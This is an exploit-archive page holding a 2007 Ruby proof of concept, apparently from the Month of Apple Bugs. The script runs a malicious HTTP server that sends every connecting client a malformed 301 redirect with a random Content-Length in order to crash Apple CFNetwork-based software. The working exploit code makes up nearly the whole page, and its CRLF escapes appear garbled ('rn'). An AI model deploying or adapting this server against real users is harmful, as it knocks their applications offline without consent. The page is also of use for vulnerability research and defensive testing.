[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Apple CFNetwork HTTP Response Denial of Service Exploit (rb code)
# Published : 2007-01-25
# Author : MoAB
# Previous Title : Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)
# Next Title : MS Windows Explorer (AVI) Unspecified Denial of Service Exploit
#!/usr/bin/ruby
# (c) Copyright 2007 Lance M. Havok <lmh [at] info-pull.com>
# Proof of concept for MOAB-25-01-2007.
#
require 'socket'
web_port = (ARGV[0] || 80).to_i
puts "++ Starting HTTP server at port #{web_port}."
web_server = TCPServer.new(nil, web_port)
while (session = web_server.accept)
rand_clen = rand(80)
useragent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0].chomp!
puts "++ Connected: #{useragent}"
session.print "HTTP/1.1 301 OKrn"
session.print "Content-Type: text/htmlrn"
session.print "Content-Length: #{rand_clen}rn"
session.print "Location: http://nonexistent123rnrn"
session.print "X" * rand_clen
session.close
end
# www.Syue.com [2007-01-25]